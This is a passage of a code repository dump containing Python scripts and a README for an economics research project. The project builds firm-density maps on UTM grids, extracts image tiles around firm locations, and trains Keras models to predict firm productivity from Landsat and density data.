"text": "# generate an atlas: a collection of locally flat maps, one for each relevant UTM zone\n\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom coord_transform import bd2wgs, wgs2utm\nfrom mectools.hyper import progress\n\nparser = argparse.ArgumentParser(description='Generate clusting and information')\nparser.add_argument('data', type=str, help='Path to firm data file')\nparser.add_argument('dense', type=str, help='Density directory')\nargs = parser.parse_args()\n\n# tools\ndef argify(f):\n def f1(x):\n y = f(*x)\n return list(y) if type(y) is tuple else y\n return f1\n\n# utm gridding\nsize = 1e6 # kilometers\npixel = 15 # meters\nN = int(np.round(size/pixel))\nulon = np.linspace(-size/2, size/2, N+1)\nulat = np.linspace(-size/2, size/2, N+1)\n\n# utm info\nutm_cent = pd.read_csv('meta/utm_centers.csv', index_col='utm')\nutm_cent['lon_west'] = utm_cent['lon'] - 3\nutm_cent['lon_east'] = utm_cent['lon'] + 3\nutm_cent['lat_north'] = utm_cent['lat'] + 4\nutm_cent['lat_south'] = utm_cent['lat'] - 4\nutm_cent['utm_west'] = utm_cent['east'] - size/2\nutm_cent['utm_east'] = utm_cent['east'] + size/2\nutm_cent['utm_north'] = utm_cent['north'] + size/2\nutm_cent['utm_south'] = utm_cent['north'] - size/2\nutm_cent['size'] = size\nutm_cent['pixel'] = pixel\nutm_cent['N'] = N\n\n# load firm data\nfirms = pd.read_csv(args.data)\nfirms['id'] = firms['id'].astype(np.int)\nfirms['sic4'] = firms['sic4'].astype(np.int)\nfirms['sic2'] = firms['sic4'] // 100\n\n# find all relevant UTM zones and make converters\nutm_zones = sorted(firms['utm_zone'].unique())\nutm_proj = {z: Proj(f'+proj=utm +zone={z}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs') for z in utm_zones}\nprint(utm_zones)\n\n# save utm cell info\nutm_cent.loc[utm_zones].to_csv(f'{args.dense}/utm_cells.csv')\n\n# group by utm zone and compute histograms\ndense = {}\nfor zone, idx in firms.groupby('utm_zone').groups.items():\n this_cent = utm_cent.loc[zone]\n df = firms[\n (firms['lon_wgs84'] >= this_cent['lon_west'] - 2) &\n (firms['lon_wgs84'] < this_cent['lon_east'] + 2) &\n (firms['lat_wgs84'] >= this_cent['lat_south'] - 2) &\n (firms['lat_wgs84'] < this_cent['lat_north'] + 2)\n ].copy()\n\n this_proj = utm_proj[zone]\n df[['utm_east', 'utm_north']] = df[['lon_wgs84', 'lat_wgs84']].apply(argify(this_proj), raw=True, result_type='expand', axis=1)\n df['utm0_east'] = df['utm_east'] - this_cent.loc['east'] # recenter coordinates\n df['utm0_north'] = df['utm_north'] - this_cent.loc['north'] # recenter coordinates\n\n df['pix_east'] = np.digitize(df['utm0_east'], ulon)\n df['pix_north'] = np.digitize(df['utm0_north'], ulat)\n df1 = df[(df['pix_east']>0)&(df['pix_east']<N+1)&(df['pix_north']>0)&(df['pix_north']<N+1)]\n df1[['pix_east', 'pix_north']] -= 1\n print(zone, len(df), len(df1))\n\n hist1 = df1.groupby(['pix_east', 'pix_north']).size().rename('count').reset_index()\n hist1['density'] = hist1['count']/(pixel/1e3)**2 # firms per square kilometer\n hist1.to_csv(f'{args.dense}/total_utm{zone}_{pixel}px.csv', index=False)\n\n hist2 = df1.groupby(['sic2', 'pix_east', 'pix_north']).size().rename('count').reset_index()\n hist2['density'] = hist2['count']/(pixel/1e3)**2 # firms per square kilometer\n hist2.to_csv(f'{args.dense}/industry_utm{zone}_{pixel}px.csv', index=False)\n"
},
{
"alpha_fraction": 0.6202117204666138,
"alphanum_fraction": 0.6325312852859497,
"avg_line_length": 38.35606002807617,
"blob_id": "dfc887dcabf6165e09e8b959b4032519d61ee6e2",
"content_id": "83fbb881c20e2a76e58b6d3a2de885c81f586c28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5195,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 132,
"path": "/code/tiles_density.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom scipy.ndimage.filters import gaussian_filter\nfrom coord_transform import wgs2utm\nfrom multiprocessing import Pool\n\n# lest pillow complain\nImage.MAX_IMAGE_PIXELS = 1000000000\n\n# to limit directory sizes\ndef store_chunk(loc, tag, ext='jpg', overwrite=False):\n tag = f'{tag:07d}'\n sub = tag[:4]\n psub = f'{loc}/{sub}'\n os.makedirs(psub, exist_ok=True)\n ptag = f'{psub}/{tag}.{ext}'\n if overwrite or not os.path.exists(ptag):\n return ptag\n else:\n return None\n\n# sigma: blur in meters\n# norm: density units\ndef extract_density_mat(mat, px, py, rad=256, size=256, sigma=2, norm=300, image=True):\n # extract area\n den = mat[py-rad:py+rad, px-rad:px+rad].toarray()\n\n # gaussian blur\n if sigma is not None:\n den = gaussian_filter(den, sigma=sigma)\n\n # normalize and rectify\n if norm is not None:\n # norm = np.quantile(den[den>0], rect)\n den = den/(den+norm)\n\n if image:\n # quantize, pitch correct, and overly inspect\n im = Image.fromarray((255*den).astype(np.uint8), 'L')\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\n im = im.resize((size, size), resample=Image.LANCZOS)\n return im\n else:\n return den\n\n# this expects WGS84 coordinates\ndef extract_density_coords(lon, lat, density, **kwargs):\n utm = wgs2utm(lon, lat)\n cells = pd.read_csv(f'{density}/utm_cells.csv', index_col='utm')\n pixel, N = cells.loc[utm, 'pixel'], cells.loc[utm, 'N']\n west, south, span = cells.loc[utm, ['utm_west', 'utm_south', 'size']]\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n hist = pd.read_csv(f'{density}/density_utm{utm}_{pixel}px.csv')\n mat = sp.csr_matrix((hist['density'], (hist['pix_north'], hist['pix_east'])), shape=(N, N))\n\n x, y = proj(lon, lat)\n fx, fy = (x-west)/span, (y-south)/span\n px, py = int(fx*N), int(fy*N)\n\n return extract_density_mat(mat, px, py, **kwargs)\n\ndef make_sparse_map(data, N):\n return sp.csr_matrix((data['density'], (data['pix_north'], data['pix_east'])), shape=(N, N))\n\ndef extract_density_utm(utm, firms, density, output, overwrite=False, ext='jpg', **kwargs):\n cells = pd.read_csv(f'{density}/utm_cells.csv', index_col='utm')\n pixel, N = cells.loc[utm, 'pixel'], cells.loc[utm, 'N']\n west, south, span = cells.loc[utm, ['utm_west', 'utm_south', 'size']]\n proj = Proj(f'+proj=utm +zone={utm}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs')\n\n hist_tot = pd.read_csv(f'{density}/total_utm{utm}_{pixel}px.csv')\n mat_tot = make_sparse_map(hist_tot, N)\n path_tot = f'{output}/total'\n\n hist_ind = pd.read_csv(f'{density}/industry_utm{utm}_{pixel}px.csv')\n group_ind = hist_ind.groupby('sic2').groups\n mat_ind = {ind: make_sparse_map(hist_ind.loc[rows], N) for ind, rows in group_ind.items()}\n path_ind = f'{output}/industry'\n\n for _, tag, ind, lon, lat in firms[['id', 'sic2', 'lon_wgs84', 'lat_wgs84']].itertuples():\n x, y = proj(lon, lat)\n fx, fy = (x-west)/span, (y-south)/span\n px, py = int(fx*N), int(fy*N)\n\n if (fname_tot := store_chunk(path_tot, tag, ext=ext, overwrite=overwrite)) is not None:\n im_tot = extract_density_mat(mat_tot, px, py, **kwargs)\n im_tot.save(fname_tot)\n\n if (fname_ind := store_chunk(path_ind, tag, ext=ext, overwrite=overwrite)) is not None:\n im_ind = extract_density_mat(mat_ind[ind], px, py, **kwargs)\n im_ind.save(fname_ind)\n\nif __name__ == '__main__':\n import argparse\n from multiprocessing import Pool\n\n # parse input arguments\n parser = 
argparse.ArgumentParser(description='Extract density tiles around firm locations')\n    parser.add_argument('firms', type=str, help='firm data file')\n    parser.add_argument('density', type=str, help='path to density directory')\n    parser.add_argument('output', type=str, help='directory to output to')\n    parser.add_argument('--sample', type=int, default=None, help='sample only N firms')\n    parser.add_argument('--overwrite', action='store_true', help='clobber existing files')\n    parser.add_argument('--threads', type=int, default=10, help='number of threads to use')\n    parser.add_argument('--chunksize', type=int, default=1_000, help='number of firms per worker chunk')\n    args = parser.parse_args()\n\n    firms = pd.read_csv(args.firms, usecols=['id', 'sic4', 'utm_zone', 'lon_wgs84', 'lat_wgs84'])\n    firms['sic2'] = firms['sic4'] // 100\n\n    if args.sample is not None:\n        firms = firms.sample(n=args.sample)\n\n    firms = firms.sort_values(by=['utm_zone']).reset_index(drop=True)\n    firms = firms.rename_axis('row', axis=0).reset_index()\n    firms['row_group'] = firms['row'] // args.chunksize\n\n    utm_grp = firms.groupby(['utm_zone', 'row_group'])\n    utm_map = [(z, firms.loc[i]) for (z, g), i in utm_grp.groups.items()]\n    print(len(utm_map))\n\n    opts = {'overwrite': args.overwrite}\n    def extract_func(z, f):\n        extract_density_utm(z, f, args.density, args.output, **opts)\n\n    with Pool(args.threads) as pool:\n        pool.starmap(extract_func, utm_map, chunksize=1)\n"
},
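A quick smoke test of `extract_density_mat` on synthetic counts; the random matrix, center pixel, and import path are assumptions (the function lives in `code/tiles_density.py` above).

```python
# Smoke test with synthetic data; assumes tiles_density.py above is importable.
import numpy as np
import scipy.sparse as sp
from tiles_density import extract_density_mat

N = 1024
rng = np.random.default_rng(0)
mat = sp.csr_matrix((np.ones(500), (rng.integers(0, N, 500), rng.integers(0, N, 500))),
                    shape=(N, N))
im = extract_density_mat(mat, px=512, py=512, rad=256, size=256)
print(im.size, im.mode)  # (256, 256) 'L': a grayscale density tile
```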
{
"alpha_fraction": 0.6053770184516907,
"alphanum_fraction": 0.6347342133522034,
"avg_line_length": 37.52381134033203,
"blob_id": "b2e70dc51effa1b3fd6c1138182d3343128e9bb8",
"content_id": "69fb61fc79c043a88881caa31bda49cfe42ee247",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3236,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 84,
"path": "/code/train_tools.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport sklearn.model_selection as sk\nfrom scipy.interpolate import InterpolatedUnivariateSpline\n\n##\n## model fit evaluation\n##\n\ndef interp_pandas(data, index=None, xmin=None, xmax=None, N=None):\n index0 = data.index\n if index is None:\n if xmin is None: xmin = index0.min()\n if xmax is None: xmax = index0.max()\n if N is None: N = 100\n index = np.linspace(index0.min(), index0.max(), N)\n def terp(x):\n spline = InterpolatedUnivariateSpline(index0, x)\n return pd.Series(spline(index), index=index)\n if type(data) is pd.Series:\n return terp(data)\n elif type(data) is pd.DataFrame:\n return pd.DataFrame({x: terp(data[x]) for x in data})\n\ncolor = (0.32628988850442137, 0.6186236063052672, 0.802798923490965)\ndef plot_errors(y, s, data, ax, alpha=0.4, interp=True):\n if interp:\n data1 = interp_pandas(data[[y, s]])\n else:\n data1 = data.copy()\n indx, vals, stds = data1.index, data1[y], data1[s]\n lo1, hi1 = vals - stds, vals + stds\n lo2, hi2 = lo1 - stds, hi1 + stds\n ax.plot(indx, vals, color=color)\n ax.fill_between(indx, lo1, hi1, color=color, alpha=alpha)\n ax.fill_between(indx, lo2, hi2, color=color, alpha=0.5*alpha)\n\nlnorm = mpl.colors.LogNorm()\ndef eval_model(y, yhat, N=10, axs=None, qmin=None, qmax=None, ymin=None, ymax=None):\n ax0, ax1 = axs\n if qmin is not None: ymin = np.quantile(y, qmin)\n if qmax is not None: ymax = np.quantile(y, qmax)\n\n res = pd.DataFrame({'y': y, 'yhat': yhat}).astype(np.float)\n ax0.hexbin(res['y'], res['yhat'], cmap=mpl.cm.Blues, norm=lnorm,\n gridsize=20, extent=(ymin, ymax, ymin, ymax))\n\n bins = np.linspace(ymin, ymax, N)\n res['ybin'] = np.digitize(res['y'], bins)\n res['ybin'] = np.minimum(N-1, res['ybin'])\n bmean = res.groupby('ybin')['yhat'].agg(mean=np.mean, var=np.std, size=len)\n bmean['std'] = bmean['var']/np.sqrt(bmean['size'])\n bmean = bmean.reindex(np.arange(N))\n bmean.index = bins\n plot_errors('mean', 'std', bmean, ax1)\n\n ax0.set_xlabel('True Productivity')\n ax0.set_ylabel('Predicted Productivity')\n ax0.set_title('Joint Distribution')\n ax1.set_xlabel('True Productivity')\n # ax1.set_ylabel('Predicted Productivity')\n ax1.set_title(f'Binned Results ({N})')\n\ndef predict_data(model, data, steps):\n it = iter(data)\n x_test, y_test = zip(*[next(it) for _ in range(steps)])\n yh_test = [model.predict(x) for x in x_test]\n x_test = [np.concat(x) for x in zip(*x_test)]\n y_test = np.concat(y_test).squeeze()\n yh_test = np.concat(yh_test).squeeze()\n return x_test, y_test, yh_test\n\n# semi-balanced category split\ndef categ_split(data, cat, val_frac, state=None):\n cat_train, cat_valid = sk.train_test_split(data[cat].unique(), test_size=val_frac, random_state=state)\n cat_group = pd.concat([\n pd.DataFrame({cat: cat_train, 'group': 'train'}),\n pd.DataFrame({cat: cat_valid, 'group': 'valid'})\n ], axis=0).set_index(cat)\n data_group = data[[cat]].join(cat_group, on=cat)\n df_train = data[data_group['group']=='train']\n df_valid = data[data_group['group']=='valid']\n return df_train, df_valid\n"
},
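`categ_split` keeps whole categories on one side of the split; a toy demonstration follows (the frame and seed are illustrative, with `sic2` standing in for the grouping column).

```python
# Toy use of categ_split from train_tools.py above; data and seed are made up.
import pandas as pd
from train_tools import categ_split

df = pd.DataFrame({'sic2': [13, 13, 17, 17, 26, 26, 31, 31], 'y': range(8)})
train, valid = categ_split(df, 'sic2', val_frac=0.25, state=42)
assert set(train['sic2']).isdisjoint(valid['sic2'])  # no industry straddles the split
print(len(train), len(valid))  # 6 2
```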
{
"alpha_fraction": 0.6527742743492126,
"alphanum_fraction": 0.6834304332733154,
"avg_line_length": 44.36781692504883,
"blob_id": "0fef0194d5ccc13e0827c9a15498dbcbb5884060",
"content_id": "cc0591f571dab5fd1c978be1e71b07874192ee67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7894,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 174,
"path": "/code/train_models.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nfrom tensorflow import keras\n\n##\n## high complexity, dual channel\n##\n\ndef gen_dual_high(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=16, kernel_size=8, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=32, kernel_size=8, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=64, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## medium complexity, dual channel\n##\n\ndef gen_dual_medium(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=8, kernel_size=8, activation='relu')(input_map)\n layer2 = Pooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=16, kernel_size=8, activation='relu')(layer2)\n layer4 = Pooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=32, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## low complexity, dual channel\n##\n\ndef gen_dual_low(K, C, loss='mean_squared_error', optimizer='adam', pooling='AveragePooling2D'):\n Pooling2D = getattr(keras.layers, pooling)\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.Conv2D(filters=4, kernel_size=8, activation='relu')(input_map)\n layer2 = Pooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.Conv2D(filters=8, kernel_size=8, activation='relu')(layer2)\n layer4 = Pooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = keras.layers.Dropout(0.5)(layer5)\n layer7 = keras.layers.Dense(units=16, activation='relu')(layer6)\n layer8 = keras.layers.Dropout(0.5)(layer7)\n output = keras.layers.Dense(units=1)(layer8)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n\n##\n## depthwise convolve, high complexity\n##\n\ndef gen_depth_high(K, C, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=8, kernel_size=8, activation='relu')(input_map)\n layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=4, activation='relu')(layer2)\n layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n layer5 = keras.layers.Flatten()(layer4)\n layer6 = 
keras.layers.Dropout(0.5)(layer5)\n    layer7 = keras.layers.Dense(units=64, activation='relu')(layer6)\n    layer8 = keras.layers.Dropout(0.5)(layer7)\n    output = keras.layers.Dense(units=1)(layer8)\n    model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n    model.compile(loss=loss, optimizer=optimizer)\n    return model\n\n##\n## depthwise convolve, medium complexity\n##\n\ndef gen_depth_medium(K, C, loss='mean_squared_error', optimizer='adam'):\n    input_fid = keras.layers.Input(shape=(1,), name='fid')\n    input_map = keras.layers.Input(shape=(K, K, C), name='map')\n    layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=8, activation='relu')(input_map)\n    layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n    layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=2, kernel_size=4, activation='relu')(layer2)\n    layer4 = keras.layers.MaxPooling2D(pool_size=4)(layer3)\n    layer5 = keras.layers.Flatten()(layer4)\n    layer6 = keras.layers.Dropout(0.5)(layer5)\n    layer7 = keras.layers.Dense(units=32, activation='relu')(layer6)\n    layer8 = keras.layers.Dropout(0.5)(layer7)\n    output = keras.layers.Dense(units=1)(layer8)\n    model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n    model.compile(loss=loss, optimizer=optimizer)\n    return model\n\n##\n## depthwise convolve, low complexity\n##\n\ndef gen_depth_low(K, C, loss='mean_squared_error', optimizer='adam'):\n    input_fid = keras.layers.Input(shape=(1,), name='fid')\n    input_map = keras.layers.Input(shape=(K, K, C), name='map')\n    layer1 = keras.layers.DepthwiseConv2D(depth_multiplier=4, kernel_size=4, activation='relu')(input_map)\n    layer2 = keras.layers.MaxPooling2D(pool_size=8)(layer1)\n    layer3 = keras.layers.DepthwiseConv2D(depth_multiplier=1, kernel_size=4, activation='relu')(layer2)\n    layer4 = keras.layers.MaxPooling2D(pool_size=7)(layer3)\n    layer5 = keras.layers.Flatten()(layer4)\n    layer6 = keras.layers.Dropout(0.5)(layer5)\n    layer7 = keras.layers.Dense(units=16, activation='relu')(layer6)\n    layer8 = keras.layers.Dropout(0.5)(layer7)\n    output = keras.layers.Dense(units=1)(layer8)\n    model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n    model.compile(loss=loss, optimizer=optimizer)\n    return model\n\n##\n## average density model\n##\n\ndef gen_avg_density(K, C, loss='mean_squared_error', optimizer='adam'):\n    input_fid = keras.layers.Input(shape=(1,), name='fid')\n    input_map = keras.layers.Input(shape=(K, K, C), name='map')\n    layer1 = keras.layers.GlobalAveragePooling2D()(input_map)\n    output = keras.layers.Dense(units=1)(layer1)\n    model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n    model.compile(loss=loss, optimizer=optimizer)\n    return model\n\n##\n## variable radius pooling model\n##\n\nclass RadialPooling2D(keras.layers.Layer):\n    def __init__(self, R, S, **kwargs):\n        super().__init__(**kwargs)\n        self.R = R\n        self.S = S\n\n    def build(self, input_shape):\n        _, self.span_x, self.span_y, self.chan = input_shape\n        self.size0 = self.add_weight(name='size', shape=(1,), dtype=tf.float32, initializer='uniform', trainable=True)\n        super().build(input_shape)\n\n    def call(self, x):\n        size = self.R*keras.activations.sigmoid(self.size0)\n        zero_x, zero_y = int(self.span_x//2), int(self.span_y//2)\n        vals_x, vals_y = tf.cast(tf.range(self.span_x), tf.float32), tf.cast(tf.range(self.span_y), dtype=tf.float32)\n        grid_x, grid_y = tf.meshgrid(vals_x, vals_y)\n        radius = tf.sqrt((grid_x-zero_x)**2+(grid_y-zero_y)**2)\n        mask = keras.activations.sigmoid(-(radius-size)/self.S)[None,:,:,None]\n        return 
tf.reduce_mean(x*mask, axis=[1, 2])\n\n def compute_output_shape(self, input_shape):\n return (1,)\n\ndef gen_radial_pool(K, C, P, R=128, S=5, loss='mean_squared_error', optimizer='adam'):\n input_fid = keras.layers.Input(shape=(1,), name='fid')\n input_map = keras.layers.Input(shape=(K, K, C), name='map')\n pool = keras.layers.Concatenate()([RadialPooling2D(R, S)(input_map) for _ in range(P)])\n output = keras.layers.Dense(1)(pool)\n model = keras.Model(inputs=[input_fid, input_map], outputs=[output])\n model.compile(loss=loss, optimizer=optimizer)\n return model\n"
},
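A shape sanity check for one of the generators above; the tile size, channel count, and batch are illustrative assumptions. Note the `fid` input is carried for bookkeeping and does not feed the output graph.

```python
# Forward-pass shape check for gen_dual_low; all sizes here are assumptions.
import numpy as np
from train_models import gen_dual_low

K, C = 256, 2                        # e.g. 256x256 tiles with 2 density channels
model = gen_dual_low(K, C)
fid = np.zeros((4, 1), dtype=np.float32)
maps = np.random.rand(4, K, K, C).astype(np.float32)
print(model.predict([fid, maps]).shape)  # (4, 1): one scalar prediction per tile
```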
{
"alpha_fraction": 0.7525951266288757,
"alphanum_fraction": 0.7652825713157654,
"avg_line_length": 43.46154022216797,
"blob_id": "866c0561ee530e45464d9edb46d36fc70a7f13db",
"content_id": "20a1f5bd332e3cca7f16e5bb811def00ff8dfd40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1734,
"license_type": "no_license",
"max_line_length": 257,
"num_lines": 39,
"path": "/README.md",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "## Geographic Clustering\n\nNeed to set up Google Cloud SDK and gsutil. More info on Google hosted Landsat data at: [https://cloud.google.com/storage/docs/public-datasets/landsat](https://cloud.google.com/storage/docs/public-datasets/landsat).\n\n#### Scene selection\n\nDownload full index from Google: [gs://gcp-public-data-landsat/index.csv.gz](gs://gcp-public-data-landsat/index.csv.gz), save to `index/landsat/google_landsat_index.csv`.\n\nGiven the master index of scenes, need to filter by spatiotemporal range and select for optimal viewing conditions (due to cloud coverage). This is done using `filter_scenes.py`, which outputs to something like `data/scenes/google_scenes_2002_mincloud.csv`.\n\nFetch selected scenes with `fetch_scenes.py`. Save to `data/scenes` directory.\n\n#### Firm resolution\n\nIndex which scene each firm is located in. Use `firm_scenes.py` and output to something like `index/firms/census2004_mincloud2002.csv`. This also performs the `BD-09` to `WGS-84` conversion and generates `UTM` values.\n\n#### Density generation\n\nGenerate sparse firm density information partitioned by expanded, partially overlapping `UTM` squares. Run `firm_density.py` to store in `data/density`.\n\nTODO: construct upstream, downstream, and within measures.\n\n#### Extract firm tiles\n\nUse `generate_tiles.py` to generate satellite and density tiles from firm data and store in `data/tiles/*`.\n\n#### Train algorithm\n\nPrimary training code is in `notebooks/dataset.ipynb`.\n\n### Notes\n\nSome notes on technical matters.\n\n#### Coordinates\n\n- `WGS-84`: standard coordinate system used by GPS, developed by US DOD\n- `GCJ-02`: coordinate system used by Chinese, location is fuzzed\n- `BD-09`: updated coordinate system used by Baidu, more fuzzing\n"
},
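The coordinate note above is the crux of the geocoding step; here is a small sketch of the BD-09 to WGS-84 conversion using `code/coord_transform.py` (the sample point is illustrative).

```python
# Sketch of the BD-09 -> WGS-84 step from the pipeline; coordinate is made up.
from coord_transform import bd2wgs, wgs2utm

lon_bd, lat_bd = 116.404, 39.915           # a Baidu-datum point near Beijing
lon_wgs, lat_wgs = bd2wgs(lon_bd, lat_bd)  # invert the BD-09 and GCJ-02 offsets
print(lon_wgs, lat_wgs, wgs2utm(lon_wgs, lat_wgs))
```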
{
"alpha_fraction": 0.6685330271720886,
"alphanum_fraction": 0.6969018578529358,
"avg_line_length": 30.89285659790039,
"blob_id": "22d46b99ed956db1adc60200ae1b9c4f44e10e60",
"content_id": "537e11045e9c241b7ee0c24e4277b0f42e0564b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2679,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 84,
"path": "/code/train_predictor.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "# train predictor\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport PIL\nimport statsmodels.formula.api as smf\nimport sklearn.model_selection as sk\nimport mectools.data as dt\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# args\nseed = 2384923\nsamp = 0.01\nBATCH_SIZE = 32\nsize = 1024\n\n# random init\nstate = np.random.RandomState(seed)\n\n# functions\ndef load_path(tag, base='tiles/density', ext='jpg'):\n tag = f'{tag:07d}'\n sub = tag[:4]\n return f'{base}/{size}px/{sub}/{tag}.{ext}'\n\n# load in firm and location data\nfirms = pd.read_csv('firms/census_2004_geocode.csv', usecols=['id', 'industry', 'income', 'total_assets', 'employees'])\ntarg = pd.read_csv('targets/census_firms_2004.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84'])\nfirms = pd.merge(firms, targ, on='id', how='left').dropna()\n\n# downsample for now\nfirms = firms.sample(frac=samp)\n\n# resolve image paths\nfirms['file'] = firms['id'].apply(load_path)\nfirms['fexist'] = firms['file'].apply(os.path.exists)\nfirms = firms[firms['fexist']]\n\n# calculate outcome stats\nfirms['prod'] = firms['income']/firms['employees']\nfirms['lprod'] = dt.log(firms['prod'])\nfirms = firms.dropna(subset=['lprod'])\n\n# calculate residual performance\nreg_ind = smf.ols('lprod ~ 0 + C(industry)', data=firms).fit()\nfirms['lprod_resid'] = reg_ind.resid\n\n# map into feature/label vocab\nfeatures = np.stack([np.array(PIL.Image.open(fn)) for fn in firms['file']])\nlabels = firms['lprod_resid'].values\n\n# conform to shapes\nfeatures = features[:,:,:,None].astype(np.float32)/255 # single channel image\nlabels = labels.astype(np.float32)[:,None]\n\n# do train/test split\nX_train, X_valid, y_train, y_valid = sk.train_test_split(features, labels, test_size=0.2, random_state=seed)\n\n# define keras model\nmodel = keras.Sequential([\n keras.layers.Conv2D(filters=32, kernel_size=4, activation='relu'),\n keras.layers.Conv2D(filters=32, kernel_size=4, activation='relu'),\n keras.layers.MaxPooling2D(pool_size=4),\n keras.layers.Dropout(0.5),\n keras.layers.Conv2D(filters=64, kernel_size=4, activation='relu'),\n keras.layers.Conv2D(filters=64, kernel_size=4, activation='relu'),\n keras.layers.MaxPooling2D(pool_size=4),\n keras.layers.Dropout(0.5),\n keras.layers.Flatten(),\n keras.layers.Dense(units=512, activation='relu'),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(units=1)\n])\n\n# train keras model\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nhistory = model.fit(X_train, y_train, epochs=100, validation_data=[X_valid, y_valid])\n\n# evaluate model\nyhat_valid = model.predict(X_valid)\nres = pd.DataFrame({'y': y_valid[:,0], 'yhat': yhat_valid[:,0]})\nres['err'] = res['yhat'] - res['y']\n"
},
{
"alpha_fraction": 0.5834745764732361,
"alphanum_fraction": 0.5989406704902649,
"avg_line_length": 32.47517776489258,
"blob_id": "11f02890cb2cd7b43efe08553beb33aad084b977",
"content_id": "8d04693d63334d6e3fe762482cfbabb57a299773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4720,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 141,
"path": "/code/tiles_satellite.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
